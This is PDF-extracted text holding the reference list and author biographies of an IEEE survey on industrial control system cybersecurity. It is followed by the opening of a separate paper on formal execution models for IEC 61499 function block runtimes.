Cyber_A4_Leaflet_eng_web.pdf. [15] J. Meserve, Mouse click could plunge city into darkness, experts say, CNN ,2 0 0 7 . [Online]. Available: http://www.cnn.com/ 2007/US/09/27/power.at.risk/index.html. [16] Security Matters, The Aurora attack. [Online]. Available: http://www.secmatters. com/casestudy10. [17] D. Kushner, The real story of Stuxnet, 2013. [Online]. Available: http://spectrum.ieee.org/telecom/security/ the-real-story-of-stuxnet. [18] M. B. Line, A. Zand, G. Stringhini, and R. Kemmerer, Targeted attacks againstindustrial control systems: Is the power industry prepared? in Proc. 2nd Workshop Smart Energy Grid Security , 2014, pp. 13 22. [19] C. Miller and C. Valasek, Remote exploitation of an unaltered passenger vehicle, 2015. [Online]. Available: https:// www.defcon.org/html/defcon-23/ dc-23-speakers.html#Miller. [20] K. Thomas, Hackers demo Jeep security hack, 2015. [Online]. Available: http:// www.welivesecurity.com/2015/07/22/hackers-demo-jeep-security-hack/. [21] N. G. Tsoutsos, C. Konstantinou, and M. Maniatakos, Advanced techniques for designing stealthy hardware trojans, in Proc. 51st Design Autom. Conf. , 2014, pp. 1 4. [22] Y. Jin, M. Maniatakos, and Y. Makris, Exposing vulnerabilities of untrusted computing platforms, in Proc. 30th IEEE Int. Conf. Comput. Design , 2012, pp. 131 134. [23] K. Rosenfeld and R. Karri, Attacks and Defenses for jtag, 2010. [24] M. F. Breeuwsma, Forensic imaging of embedded systems using jtag (boundary-scan), Digital Investigation , vol. 3, no. 1, pp. 32 42, 2006. [25] J. Barnaby, Exploiting embedded systems, Black Hat 2006, 2006. [Online]. Available: http://www.blackhat.com/ presentations/bh-europe-06/ bh-eu-06-Jack.pdf. [26] D. Schneider, USB flash drives are more dangerous than you think. [Online]. Available: http://spectrum.ieee.org/ tech-talk/computing/embedded-systems/ usb-flash-drives-are-more-dangerous-than-you-think. [27] USB Killer. [Online]. Available: http:// kukuruku.co/hub/diy/usb-killer. Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1053McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. [28] bunnie and xobs, 30c3d, The exploration and exploitation of an SD memory card. [Online]. Available: http://bunniefoo.com/ bunnie/sdcard-30c3-pub.pdf. [29] S. Skorobogatov, Flash memory bumping attacks, in Proc. Cryptogr. Hardware Embedded Syst. , 2010, pp. 158 172. [30] R. Templeman and A. Kapadia, Gangrene: Exploring the mortality of flash memory, HotSec , vol. 12, p. 1, 2012. [31] X. Wang, C. Konstantinou, M. Maniatakos, and R. Karri, Confirm: Detecting firmwaremodifications in embedded systems using hardware performance counters, in Proc. 34th IEEE/ACM Int. Conf. Comput.-Aided Design , 2015, pp. 544 551. [32] CRitical Infrastructure Security AnaLysIS, Crisalis Project EU, Deliverable D2.2 Final Requirement Definition. [Online]. Available: http://www.crisalis-project.eu/. [33] DHS, Common cybersecurity vulnerabilities in industrial control systems, 2011. [Online]. Available: http://ics-cert.us- cert.gov/. [34] D. Beresford, The Sauce of Utter pwnage, 2011. [Online]. Available: http:// thesauceofutterpwnage.blogspot.com/. [35] Common Vulnerabilities and Exposures, CVE-2011-2367. [Online]. Available: http://cve.mitre.org/. [36] C. Nan, I. Eusgeld, and W. Kro ger, Hidden vulnerabilities due to interdependencies between two systems, inProc. Critical Inf. Infrastructures Security , 2013, pp. 252 263. [37] T. Macaulay and B. L. Singer, Cybersecurity for Industrial Control Systems: SCADA, DCS, PLC, HMI, SIS . Boca Raton, FL, USA: CRC Press, 2011. [38] S. Shetty, T. Adedokun, and L.-H. Keel, Cyberphyseclab: A testbed for modeling,detecting and responding to security attacks on cyber physical systems, in Proc. 3rd ASE Int. Conf. Cyber Security , 2014. [39] Center for the Protection of National Infrastructure (CPNI), Cyber security assessments of industrial control systems, 2010. [Online]. Available: https://ics-cert. us-cert.gov/sites/default/files/documents/ Cyber_Security_Assessments_of_Industrial_ Control_Systems.pdf. [40] C1 Working Group Members of Power System Relaying Committee, Cyber security issues for protective relays, 2008.[Online]. Available: https://www. gedigitalenergy.com/smartgrid/May08/ 7_Cyber-Security_Relays.pdf. [41] R. E. Mahan et al. , Secure data transfer guidance for industrial control and SCADAsystems, 2011. [Online]. Available: http:// www.pnnl.gov/main/publications/external/ technical_reports/PNNL-20776.pdf. [42] B. Rolston, Attack methodology analysis: Emerging trends in computer-based attack methodologies and their applicability to control system networks, 2005. [Online]. Available: http://www5vip.inl.gov/ technicalpublications/Documents/ 3494179.pdf. [43] W. Grega, Hardware-in-the-loop simulation and its application in control education, in Proc. 29th Annu. Front. Edu. Conf. , 1999, vol. 2, pp. 12B6 12B7. [44] C. Konstantinou and M. Maniatakos, Impact of firmware modification attacks on power systems field devices, in Proc. 6th IEEE Int. Conf. Smart Grid Commun. , 2015, pp. 1 6.[45] M. Souppaya and K. Scarfone, Guide to enterprise patch management technologies, 2013. [Online]. Available: http://dx.doi.org/ 10.6028/NIST.SP.800-40r3. [46] European Network and Information Security Agency (ENISA), Good practice guide for certs in the area of industrial control systems, 2013. [Online]. Available: https://www.enisa.europa.eu/. [47] A. Nicholson, H. Janicke, and A. Cau, Position paper: Safety and security monitoring in ICS/SCADA systems, inProc. 2nd Int. Symp. ICS SCADA Cyber Security Res. , 2014, pp. 61 66. [48] C. Konstantinou, M. Maniatakos, F. Saqib, S. Hu, J. Plusquellic, and Y. Jin, Cyber-physical systems: A securityperspective, in Proc. 20th IEEE Eur. Test Symp. , 2015, pp. 1 8. [49] Scilab, Open source and cross-platform platform. [Online]. Available: http://www. scilab.org/. [50] Scicos, Block diagram modeler/simulator. [Online]. Available: http://www.scicos.org/. [51] H. K. Fathy, Z. S. Filipi, J. Hagena, and J. L. Stein, Review of hardware-in-the-loop simulation and its prospects in the automotive area, Ann Arbor , vol. 1001, pp. 48 109 2125, 2006. [52] National Institute of Standards and Technology, A cybersecurity testbed for industrial control systems, 2014. [Online]. Available: http://www.nist.gov/manuscript-publication-search.cfm?pub_id=915876. [53] M. Zeller, Myth or reality-does the aurora vulnerability pose a risk to my generator? inProc. 64th Annu. Conf. Protective Relay Eng., 2011, pp. 130 136. [54] National Institute of Standards and Technology, Measurement Challenges and Opportunities for Developing Smart GridTestbeds Workshop 2014. [Online]. Available: http://www.nist.gov/smartgrid/ upload/SG-Testbed-Workshop-Report- FINAL-1-2-8-2014.pdf. [55] I. N. Fovino, M. Masera, L. Guidi, and G. Carpi, An experimental platform for assessing SCADA vulnerabilities and countermeasures in power plants, in Proc. 3rd Int. Conf. Human Syst. Interactions , 2010, pp. 679 686. [56] Idaho National Laboratory, National SCADA Test Bed (NSTB) Program. [Online]. Available: https://www.inl.gov/. [57] A. Hahn, A. Ashok, S. Sridhar, and M. Govindarasu, Cyber-physical security testbeds: Architecture, application, evaluation for smart grid, IEEE Trans. Smart Grid , vol. 4, no. 2, pp. 847 855, 2013. [58] Digital Bond, Project basecamp. [Online]. Available: http://www.digitalbond.com/ tools/basecamp/. [59] B. Reaves and T. Morris, An open virtual testbed for industrial control system security research, Int. J. Inf. Security , vol. 11, no. 4, pp. 215 229, 2012. [60] P. F. Roberts, Zotob, PnP Worms Slam 13 DaimlerChrysler Plants, 2008. [Online]. Available: http://www.eweek.com. [61] Computer viruses make it to orbit, BBC News , Aug. 2008. [Online]. Available: http://news.bbc.co.uk/2/hi/7583805.stm. [62] B. Krebs, Cyber incident blamed for nuclear power plant shutdown, The Washington Post , Jun. 2008. [Online]. Available: http://www.washingtonpost.com/ wp-dyn/content/article/2008/06/05/ AR2008060501958.html.[63] S. Grad, Engineers who hacked into L.A. traffic signal computer, jamming streets, sentenced, Los Angeles Times . [Online]. Available: http://latimesblogs.latimes.com/lanow/2009/12/engineers- who-hacked-in-la-traffic-signal-computers- jamming-traffic-sentenced.html. [64] N. Leall, Lessons from an insider attack on SCADA systems, 2009. [Online].Available: http://blogs.cisco.com/security/ lessons_from_an_insider_attack_ on_scada_systems/. [65] K. Zetter, Clues suggest Stuxnet virus was built for subtle nuclear sabotage, Wired , 2010. [Online]. Available: http://www. wired.com/threatlevel/2010/11/stuxnet-clues/. [66] J. Leyden, Polish teen derails tram after hacking train network, The Register ,2 0 0 8 . [Online]. Available: http://www.theregister. co.uk/2008/01/11/tram_hack/. [67] J. Meserve, Sources: Staged cyber attack reveals vulnerability in power grid, CNN , 2007. [Online]. Available: http://articles. cnn.com/2007-09-26/us/power.at. risk_1_generator-cyber-attack-electric- infrastructure?_s=PM:US. [68] E. Byres and J. Lowe, The myths and facts behind cyber security risks for industrial control systems, in Proc. ISA Process Control Conf. ,2 0 0 3 . [69] J. Pollet, Electricity for free? the dirty underbelly of SCADA and smart meters, inProc. Black Hat USA ,2 0 1 0 . [70] L. Pie tre-Cambace `de s, M. Trischler, and G. N. Ericsson, Cybersecurity myths on power control systems: 21 misconceptions and false beliefs, IEEE Trans. Power Delivery , vol. 26, no. 1, pp. 161 172, 2011. [71] National Energy Regulatory Commission, NERC CIP 002 1 Critical cyber asset identification, 2006. [72] J. Weiss, Are the NERC CIPS making the grid less reliable, in Proc. Control Global , 2009. [73] D. Beresford, Exploiting Siemens Simatic S7 PLCs, in Proc. Black Hat USA , 2011. [74] T. Newman, T. Rad, and J. Strauchs, SCADA & PLC vulnerabilities in correctional facilities, white paper, 2011. [75] S. Blumsack and A. Fernandez, Ready or not, here comes the smart grid, Energy , vol. 37, no. 1, pp. 61 68, 2012. [76] C. S. King, The economics of real-time and time-of-use pricing for residential consumers, American Energy Institute, Tech. Rep., 2001. [77] S. McLaughlin, D. Podkuiko, and P. McDaniel, Energy theft in the advanced metering infrastructure, in Proc. 4th Int. Workshop Critical Infrastructure Protection , 2009. [78] S. McLaughlin, D. Podkuiko, S. Miadzvezhanka, A. Delozier, and P. McDaniel, Multi-vendor penetration testing in the advanced metering infrastructure, in Proc. 26th Annu. Comput. Security Appl. Conf. ,2 0 1 0 . [79] Laboratory of Cryptography and System Security (CrySyS), Duqu: A Stuxnet-like malware found in the wild, Budapest Univ. Technol. Econ., Budapest, Hungary,Tech. Rep., 2011. [80] S. McLaughlin, On dynamic malware payloads aimed at programmable logiccontrollers, in Proc. 6th USENIX Workshop Hot Topics Security , 2011. [81] S. McLaughlin, D. Pohly, P. McDaniel, and S. Zonouz, A trusted safety verifier for 1054 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. process controller code, in Proc. 21st Annu. Netw. Distrib. Syst. Security Symp. , 2014. [82] C. Chevillat, D. Carrington, P. Strooper, J. Su Q, and L. Wildman, Model-based generation of interlocking controller software from control tables, in Model Driven Architecture Foundations and Applications , Lecture Notes in Computer ScienceI. Schieferdecker, and A. Hartman, Eds. Berlin, Germany: Springer-Verlag, 2008, vol. 5095, pp. 349 360. [83] PROFIBUS, IMS research estimates top position for PROFINET, 2010. [Online]. Available: http://www.profibus.com/news- press/detail-view/article/ims-research-est imates-top-position-for-profinet/. [84] S. McLaughlin and P. McDaniel, SABOT: Specification-based payload generation for programmable logic controllers, in Proc. 19th ACM Conf. Comput. Commun. Security , 2012. [85] Y. Liu, P. Ning, and M. K. Reiter, False data injection attacks against state estimation in electric power grids, in Proc. 16th ACM Conf. Comput. Commun. Security , 2009. [86] Y. Mo and B. Sinopoli, False data injection attacks in control systems, in Proc. 1st Workshop Secure Control Syst. , 2010. [87] A. One, Smashing the stack for fun and profit, Phrack Mag. , vol. 49, no. 14, 2000. [88] R. Roemer, E. Buchanan, H. Shacham, and S. Savage, Return-oriented programming: Systems languages applications, ACM Trans. Inf. Syst. Security , vol. 15, no. 1, pp. 2:1 2:34, 2012. [89] A. Matrosov, E. Rodionov, D. Harley, and J. Malcho, Stuxnet under the microscope, 2011. [90] M. Abadi, M. Budiu, U . Erlingsson, and J. Ligatti, Control-flow integrity: Principles, implementations, applications, ACM Trans. Inf. Syst. Security , vol. 13, no. 1, 2009. [91] J. Pewny and T. Holz, Compiler-based CFI for iOS, in Proc. 29th Annu. Comput. Security Appl. Conf. , 2013. [92] V. Pappas, M. Polychronakis, and A. D. Keromytis, Transparent ROP exploitmitigation using indirect branch tracing, inProc. 22nd USENIX Security Symp. , 2013. [93] Y. Cheng, Z. Zhou, Y. Miao, X. Ding, and R. Huijie Deng, ROPecker: A generic and practical approach for defending against ROP attacks, in Proc. 21st Annu. Netw. Distrib. Syst. Security Symp. , 2014. [94] M. Zhang and R. Sekar, Control flow integrity for COTS binaries, in Proc. 22nd USENIX Security Symp. , 2013. [95] I. Fratric, ROPGuard: Runtime prevention of return-oriented programming attacks, 2012. [96] C. Zhang et al. , Practical control flow integrity & randomization for binary executables, in Proc. 34th IEEE Symp. Security Privacy , 2013. [97] E. Go ktas, E. Athanasopoulos, H. Bos, and G. Portokalidis, Out of control: Overcoming control-flow integrity, in Proc. 35th IEEE Symp. Security Privacy , 2014. [98] L. Davi, D. Lehmann, A.-R. Sadeghi, and F. Monrose, Stitching the gadgets: On theineffectiveness of coarse-grained control-flow integrity protection, in Proc. 23rd USENIX Security Symp. , 2014.[99] N. Carlini and D. Wagner, ROP is still dangerous: Breaking modern defenses, in Proc. 23rd USENIX Security Symp. , 2014. [100] F. Schuster et al. , Evaluating the effectiveness of current anti-rop defenses, inResearch in Attacks, Intrusions and Defenses , Lecture Notes in Computer Science. Berlin, Germany: Springer-Verlag, 2014, vol. 8688, pp. 88 108. [101] J. Demme et al. , On the feasibility of online malware detection with performance counters, ACM SIGARCH Comput. Architect. News , vol. 41, no. 3, pp. 559 570, 2013. [102] A. Tang, S. Sethumadhavan, and S. J Stolfo, Unsupervised anomaly-based malware detection using hardwarefeatures, in Research in Attacks, Intrusions and Defenses . Berlin, Germany: Springer-Verlag, 2014, pp. 109 129. [103] X. Wang and R. Karri, Numchecker: Detecting kernel control-flow modifyingrootkits by using hardware performance counters, in Proc. 50th Design Autom. Conf. , 2013, pp. 1 7. [104] A. Cui and S. J. Stolfo, Defending embedded systems with software symbiotes, in Recent Advances in Intrusion Detection . Berlin, Germany: Springer-Verlag, 2011, pp. 358 377. [105] M. Budiu, U . Erlingsson, and M. Abadi, Architectural support for software-based protection, in Proc. 1st Workshop Architect. Syst. Support Improving Softw. Dependability , 2006, pp. 42 51. [106] L. Davi, P. Koeberl, and A.-R. Sadeghi, Hardware-assisted fine-grained control-flow integrity: Towards efficient protection of embedded systems against software exploitation, in Proc. 51st Design Autom. Conf. Special Session: Trusted Mobile Embedded Computing , 2014. [107] O. Arias et al. , HAFIX: Hardware-assisted flow integrity extension, in Proc. 52nd Design Autom. Conf. , 2015. [108] F. Schuster et al. , Counterfeit object-oriented programming: On the difficulty of preventing code reuse attacksin C++ applications, in Proc. 36th IEEE Symp. Security Privacy , 2015. [109] M. Tran et al. , On the expressiveness of return-into-libc attacks, in Proc. 14th Int. Conf. Recent Adv. Intrusion Detection , 2011. [110] F. B. Cohen, Operating system protection through program evolution, Comput. Security , vol. 12, no. 6, 1993. [111] S. Forrest, A. Somayaji, and D. Ackley, Building diverse computer systems, in Proc. 6th Workshop Hot Topics Oper. Syst. , 1997. [112] PaX Team, PaX Address Space Layout Randomization (ASLR). [Online]. Available: http://pax.grsecurity.net/ docs/aslr.txt. [113] M. Franz, E unibus pluram: Massive-scale software diversity as a defense mechanism, in Proc. Workshop New Security Paradigms ,2 0 1 0 . [114] T. Jackson et al. , Compiler-generated software diversity, in Moving Target Defense , Advances in Information Security. Berlin, Germany: Springer-Verlag, 2011,vol. 54, pp. 77 98. [115] V. Pappas, M. Polychronakis, and A. D. Keromytis, Smashing the gadgets: Hindering return-oriented programming using in-place code randomization, inProc. 33rd IEEE Symp. Security Privacy ,2 0 1 2 .[116] J. D. Hiser, A. Nguyen-Tuong, M. Co, M. Hall, and J. W. Davidson, ILR: Where d my gadgets go? in Proc. 33rd IEEE Symp. Security Privacy , 2012. [117] R. Wartell, V. Mohan, K. W. Hamlen, and Z. Lin, Binary stirring: Self-randomizing instruction addresses of legacy x86 binary code, in Proc. 19th ACM Conf. Comput. Commun. Security , 2012. [118] L. Davi, A. Dmitrienko, S. Nu rnberger, and A.-R. Sadeghi, Gadge me if you can Secure and efficient ad-hocinstruction-level randomization for x86 and ARM, in Proc. 8th ACM Symp. Inf. Comput. Commun. Security , 2013. [119] S. Bhatkar, R. Sekar, and D. C. DuVarney, Efficient techniques for comprehensiveprotection from memory error exploits, in Proc. 14th USENIX Security Symp. , 2005. [120] C. Kil, J. Jun, C. Bookholt, J. Xu, and P. Ning, Address space layout permutation (ASLP): Towards fine-grainedrandomization of commodity software, in Proc. 22nd Annu. Comput. Security Appl. Conf. , 2006. [121] K. Z. Snow et al. , Just-in-time code reuse: On the effectiveness of fine-grained address space layout randomization, in Proc. 34th IEEE Symp. Security Privacy , 2013. [122] M. Backes and S. Nu rnberger, Oxymoron: Making fine-grained memory randomization practical by allowing code sharing, in Proc. 23rd USENIX Security Symp. , 2014. [123] M. Backes et al. , You can run but you can t read: Preventing disclosure exploits in executable code, in Proc. 21st ACM Conf. Comput. Commun. Security , 2014. [124] S. Crane et al. , Readactor: Practical code randomization resilient to memory disclosure, in Proc. 36th IEEE Symp. Security Privacy , 2015. [125] M. Abadi, M. Budiu, U . Erlingsson, and J. Ligatti, A theory of secure control-flow, inProc. 7th Int. Conf. Formal Methods Softw. Eng.,2 0 0 5 . [126] R. Hund, C. Willems, and T. Holz, Practical timing side channel attacks against kernel space ASLR, in Proc. 34th IEEE Symp. Security Privacy , 2013. [127] J. Seibert, H. Okhravi, and E. So derstro m, Information leaks without memory disclosures: Remote side channel attacks on diversified code, in Proc. 21st ACM SIGSAC Conf. Comput. Commun. Security , 2014. [128] V. Mohan, P. Larsen, S. Brunthaler, K. W. Hamlen, and M. Franz, Opaque control-flow integrity, in Proc. 22nd Annu. Netw. Distrib. Syst. Security Symp. ,2 0 1 5 . [129] S. McLaughlin, Stateful policy enforcement for control system device usage, in Proc. 29th Annu. Comput. Security Appl. Conf. , 2013. [130] S. Mohan et al. , S3A: Secure system simplex architecture for enhanced security of cyber-physical systems, in Proc. 2nd ACM Int. Conf. High Confidence Netw. Syst. , 2013. [131] S. Bak, K. Manamcheri, S. Mitra, and M. Caccamo, Sandboxing controllers for cyber-physical systems, in Proc. 2nd IEEE/ ACM Int. Conf. Cyber-Phys. Syst. , 2011. [132] S. McLaughlin, Blocking unsafe behaviors in control systems through static and dynamic policy enforcement, in Proc. 52nd Design Autom. Conf. , 2015. [133] B. Zhu and S. Sastry, SCADA-specific intrusion detection/prevention systems: A Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1055McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. survey and tanomy, in Proc. 1st Workshop Secure Control Syst. , 2010. [134] R. Berthier and W. H. Sanders, Specification-based intrusion detection for advanced metering infrastructures, in Proc. 17th IEEE Pacific Rim Int. Symp. Dependable Comput. , 2011. [135] D. Hadziosmanovic , R. Sommer, E. Zambon, and P. H. Hartel, Through the eye of the PLC: Semantic security monitoring for industrial processes, in Proc. 31st Annu. Comput. Security Appl. Conf. , 2014. [136] R. B. Bobba et al. , Detecting false data injection attacks on dc state estimation, in Proc. 1st Workshop Secure Control Syst. , 2010. [137] H. Sandberg, A. Teixeira, and K. H. Johansson, On security indices forstate estimators in power networks, in Proc. 1st Workshop Secure Control Syst. ,2 0 1 0 . [138] T. Jiang, I. Matei, and J. S. Baras, A trust based distributed Kalman filtering approach for mode estimation in power systems, in Proc. 1st Workshop Secure Control Syst. ,2 0 1 0 . [139] A. Teixeira, K. C. Sou, H. Sandberg, and K. H. Johansson, Secure control systems a quantitative risk management approach, IEEE Control Syst. Mag. , vol. 35, no. 1, pp. 24 45, Feb. 2015. [140] F. Pasqualetti, F. Do fler, and F. Bullo, Attack detection and identification in cyber-physical systems, IEEE Trans. Autom. Control , vol. 58, no. 11, pp. 2715 2729, Nov. 2013. [141] S. Amin, X. Litrico, S. S. Sastry, and A. M. Bayen, Stealthy deception attackson water SCADA systems, in Proc. 13th ACM Int. Conf. Hybrid Syst., Comput. Control , 2010. [142] Y. Mo and B. Sinopoli, Secure control against replay attacks, in Proc. 47th Annu. Allerton Conf. Commun. Control Comput. , 2009. [143] S. Amin, G. A. Schwartz, and S. S. Sastry, Security of interdependent and identical networked control systems, Automatica , vol. 49, no. 1, pp. 186 192, Jan. 2013. [144] H. Li and Y. Shi, Robust distributed model predicative control of constrained continuous-time nonlinear systems: A robustness constraint approach, IEEE Trans. Autom. Control , vol. 59, no. 6, pp. 1673 1678, Jun. 2014. ABOUT THE AUTHORS Stephen McLaughlin received the Ph.D. degree in computer science and engineering from thePennsylvania State University, State College, PA, USA, in 2014. He is a Senior Engineer at Samsung Research America, Mountain View, CA, USA. His work isconcerned with the ongoing security and safe op- eration of control systems that have already suf- fered a partial compromise. His results in thisarea have been published in ACM Conference onComputer and Communications Security (CCS), Internet Society Net- work and Distributed System Security Symposium (NDSS), and IEEE S E- CURITY AND PRIVACY MAGAZINE . As a part of the Samsung KNOX security team, he identifies and responds to vulnerabilities in Samsung ss m a r t - phones, mobile payments, and other devices near you right now. Charalambos Konstantinou (Student Member, IEEE) received the five-year diploma degree inelectrical and computer engineering from theNational Technical University of Athens, Athens, Greece. He is currently working toward the Ph.D. degree in electrical engineering at the Polytech-nic School of Engineering, New York University,Brooklyn, NY, USA. His interests include hardware security with p a r t i c u l a rf o c u so ne m b e d d e ds y s t e m sa n ds m a r tgrid technologies. Xueyang Wang received the B.S. degree in auto- mation from Zhejiang University, Zhejiang, China, in 2008 and the M.S. and Ph.D. degrees in com-puter engineering and electrical engineeringfrom Tandon School of Engineering, New York U n i v e r s i t y ,B r o o k l y n ,N Y ,U S A ,i n2 0 1 0a n d2 0 1 5 , respectively. His research interests include secure computing architectures, virtualization and its application to cybersecurity, hardware support for software se- curity, and hardware security. Lucas Davi received the Ph.D. degree in com- puter science from the Technische Universitt Darmstadt, Darmstadt, Germany, in 2015. He is an independent Claude Shannon re- search group leader of the Secure and Trustwor-thy Systems group at Technische Universitt Darmstadt. He is also a researcher at the Intel Collaborative Research Institute for Secure Com-puting (ICRI-SC). His research focuses on soft-ware exploitation technique and defenses. In particular, he explores exploitat ion attacks such as return-oriented programming (ROP) for ARM and Intel-based systems. Ahmad-Reza Sadeghi received the Ph.D. degree in computer science with the focus on privacyprotecting cryptographic systems from the Univer- sity of Saarland, Saarbr cken, Germany, in 2003. He is a full Professor for Computer Science at the Technische Universitt Darmstadt, Darmstadt,Germany. He is the head of the System Security Lab at the Center for Advance Security Research Darmstadt (CASED), and the Director of Intel Col-laborative Research Institute for Secure Computing(ICRI-SC) at TU Darmstadt. Prior to academia, he worked in Research and Development of Telecommunications enterprises, among others Ericsson Telecommunications. His research include systems security, mobile andembedded systems security, cyberphysical systems, trusted and secure computing, applied cryptography, and privacy-enhanced systems. Dr. Sadeghi served as general/program chair as well as program committee member of many established security conferences. He alsoserved on the editorial board of the ACM Transactions on Information and System Security (TISSEC), and as guest editor of the IEEE T RANSAC- TIONS ON COMPUTER -AIDED DESIGN (Special Issue on Hardware Security and Trust). Currently, he is the Editor-in-Chief of IEEE S ECURITY AND PRI- VACY MAGAZINE , and on the editorial board of ACM Books. He has been awarded with the renowned German prize Karl Heinz Beckurts for his research on trusted and trustworthy computing technology and itstransfer to industrial practice. The award honors excellent scientificachievements with high impact on industrial innovations in Germany. 1056 Proceedings of the IEEE |V o l .1 0 4 ,N o .5 ,M a y2 0 1 6McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply. Michail Maniatakos received the B.Sc. degree in computer science and the M.Sc. degree in em-bedded systems from the University of Piraeus, Piraeus, Greece, in 2006 and 2007, and the M.Sc. and M.Phil. degrees and the Ph.D. de-gree in electrical engineering from Yale Uni- versity, New Haven, CT, USA in 2009, 2010, and 2012. He is an Assistant Professor of Electrical and Computer Engineering at New York University (NYU) Abu Dhabi, Abu Dhabi, UAE, and a Research Assistant Professor at the NYU Polytechnic School of Engineering, Brooklyn, NY, USA. He isthe Director of the MoMA Laboratory (nyuad.nyu.edu/momalab), NYUAbu Dhabi. His research interests, funded by industrial partners and the U.S. Government, include robust microprocessor architectures, privacy- preserving computation, as well as industrial control systems security.He has authored several publications in IEEE transactions and confer- ences, and holds patents on priva cy-preserving data processing, Dr. Maniatakos is currently the Co-Chair of the Security track at IEEE International Conference on Computer Design (ICCD) and IEEE Interna-tional Conference on Very Large Scale Integration (VLSI-SoC). He also serves in the technical program committee for various conferences, in- cluding IEEE/ACM Design Automation Conference (DAC), InternationalConference on ComputerAided Design (ICCAD), ITC, and InternationalConference on Compilers, Architectures and Synthesis For Embedded Systems (CASES). He has organized several workshops on security, and he currently is the faculty lead for the Embedded Security challengeheld annually at Cyber Security Awareness Week (CSAW), Brooklyn,NY, USA. Ramesh Karri received the Ph.D. degree in computer science and engineering from the Uni-versity of California at San Diego, La Jolla, CA, USA in 1993. He is a Professor of Electrical and Computer Engineering at Tandon School of Engineering, New York University, Brooklyn, NY, USA. His re- search and education activities span hardwarecybersecurity: trustworthy ICs, processors, andcyberphysical systems; se curity-aware computer- aided design, test, verification, validation, and reliability; nano meets security; metrics; benchmarks; and hardware cybersecurity competi-tions. He has over 200 journal and conference publications includingtutorials on trustworthy hardware in IEEE C OMPUTER (two) and P ROCEED- INGS OF THE IEEE (five). Dr. Karri was the recipient of the Humboldt Fellowship and the Na- tional Science Foundation CAREER Award. He is the area director for cyber security of the NY State Center for Advanced Telecommunica- tions Technologies at NYU-Poly; Cofounded (2015 present) the Center for Cyber Security (CCS) (http://crissp.poly.edu/), co-founded the Trust-Hub (http://trust-hub.org/) and founded and organizes the Embedded Security Challenge, the annual red team blue team event at NYU, (http://www.poly.edu/csaw2014/csaw-embedded). His group sw o r ko n hardware cybersecurity was nominated for best paper awards (ICCD2015 and DFTS 2015) and received awards at conferences (ITC 2014, CCS 2013, DFTS 2013 and VLSI Design 2012) and at competitions (ACM Student Research Competition at DAC 2012, ICCAD 2013, DAC 2014,ACM Grand Finals 2013, Kaspersky Challenge and Embedded SecurityChallenge). He co-founded the IEEE/ACM Symposium on Nanoscale Architectures (NANOARCH). He served as program/general chair of conferences including IEEE International Conference on Computer De-sign (ICCD), IEEE Symposium on Hardware Oriented Security and Trust (HOST), IEEE Symposium on Defect and Fault Tolerant Nano VLSI Sys- tems (DFTS) NANOARCH, RFIDSEC 2015, and WISEC 2015. He serveso ns e v e r a lp r o g r a mc o m m i t t e e s( D A C ,I C C A D ,H O S T ,I T C ,V T S ,E T S ,ICCD, DTIS, WIFS). He is the Associate Editor of the IEEE T RANSACTIONS ONINFORMATION FORENSICS AND SECURITY (2010 2014), IEEE T RANSACTIONS ONCOMPUTER -AIDED DESIGN (2014 present), ACM Journal of Emerging Computing Technologies (2007 present), ACM Transactions on Design Automation of Electronic Systems (2014 present), IEEE A CCESS (2015 present), IEEE T RANSACTIONS ON EMERGING TECHNOLOGIES IN COMPUTING (2015 present), IEEE D ESIGN &T EST(2015 present), and IEEE E MBEDDED SYSTEMS LETTERS (2016 present). He is an IEEE Computer Society Dis- tinguished Visitor (2013 2015). He is on the Executive Committee of IEEE/ACM Design Automation Conference leading the cybersecurityinitiative (2014 present). He has delivered invited keynotes and tuto- rials on hardware security and trust (ESRF, DAC, DATE, VTS, ITC, ICCD, NATW, LATW). Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1057McLaughlin et al. : The Cybersecurity Landscape in Industrial Control Systems Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply.
Formal_Modeling_of_Function_Block_Applications_Running_in_IEC_61499_Execution_Runtime.pdf
The execution model in a new standard for dis- tributed control systems, IEC 61499, is analyzed. It is shown how the same standard compliant application running in two different standard compliant runtime environments may result in completely different behaviors. Thus, to achieve true portabilityof applications between multiple standard compliant runtime environments a more detailed execution model is necessary. In this paper a new runtime environment, Fuber, is presented along with a formal execution model. In this case the execution model is given as a set of interacting state machines which makes it straightforward to analyze the behavior of the application and runtime together using existing tools for formal veri cation. I. I NTRODUCTION Manufacturing systems and process control systems are typ- ically controlled by a distributed control system. Developingdistributed manufacturing and process control systems is time-consuming and error-prone because the environment is typi-cally heterogeneous consisting of hardware from multiple ven- dors which often imply that different languages and develop- ment tools are used to develop the software control functions.Industrial control system generally has high requirements onreliability and timing constraints of the control functions. Thusthe control software is typically written in special purposelanguages de ned in the standard IEC 61131, [1], [2] and executed on special purpose hardware called ProgrammableLogic Controllers (PLCs). However, IEC 61131, only havevery rudimentary support for developing distributed control applications. For general purpose computers a number of standards for developing distributed systems have emerged, most notableare CORBA [3], DCOM [4], and SOAP [5]. CORBA andSOAP are vendor independent techniques while DCOM relieson services offered by Microsoft Windows. Technically thesestandards may be used for distributed control systems as well,if the hardware would support them. However, due to theirsize and complexity to implement them they are unsuitablefor use by PLC programmers that typically also have limited hardware resources. For industrial control systems two existing standards are in use. Manufacturing Message Speci cation (MMS) [6] has been a standard since 1988 and de nes how the value of one variable in a PLC may be read and written from another PLC.OPC [7] relies on DCOM for transportation of data betweencomputers and is thus relying on Microsoft technologies whichmight be a problem in heterogeneous environments.In 2005 the International Electrotechnical Commission (IEC) approved a standard for distributed function blocks (FBs), IEC 61499 [8] [10] that extends 